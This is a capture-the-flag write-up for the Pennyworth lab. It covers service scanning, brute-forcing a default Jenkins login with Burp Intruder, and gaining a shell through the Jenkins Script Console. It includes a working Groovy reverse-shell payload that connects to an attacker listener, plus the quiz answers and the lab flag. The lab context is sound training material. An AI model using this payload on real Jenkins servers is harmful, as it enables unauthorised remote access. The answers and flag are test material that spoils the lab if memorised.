Pennyworth

2MB

Pennyworth_Write_Up.pdf

pdf

Task 1: What does the acronym CVE stand for?

• Common Vulnerabilities and Exposures

Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

• Confidentiality, Integrity, Availability

Task 3: What is the version of the service running on port 8080?

• Run the following nmap command:

nmap -sV -p 8080 [Target IP]

• 
• The answer is Jetty 9.4.39.v20210325

Task 4: What version of Jenkins is running on the target?

• Start by going to your web browser and typing in http://[Target IP]:8080

• At the login page, the source code does not tell us anything usefule

• Try some default passwords. Nothing usual works.

• Run the request through Intruder in Burpsuite to guess username and password

  • 
• This shows that root:password is a login

• On the admin page in the bottom right hand corner is version of Jenkins 2.289.1

Task 5: What type of script is accepted as input on the Jenkins Script Console?

• On the first admin page, it states Groovy Script

Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

• I believe they are asking what the cli is for windows:

• cmd.exe

Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

• In linux, a similar command would be:

• ifconfig

Task 8: What switch should we use with netcat for it to use UDP transport mode?

• Quick help search on netcat shows:

  • 
  • The answer is -u

Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?

• I just know this as "reverse shell"

Capture the Flag:

• Browse for vulnerabilities in Jenkins.

  • Discovered https://github.com/gquere/pwn_jenkins

    • Multiple ways to bypass login but at the end is a script you can plugin to the "Script Console" in the "Manage Jenkins" Tab on the right.

      • http://[Target IP]:8080/script

  • Start up a netcat listener on the host machine:

nc -lvnp 4444

• in the "Script Console" plugin the following command from the github link below to make a reverse shell connection back to the host machine.

String host="HOST_IP";
int port=4444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

• The flag is located in /root/flag.txt

• The flag is "9cdfb439c7876e703e307864c9167a15"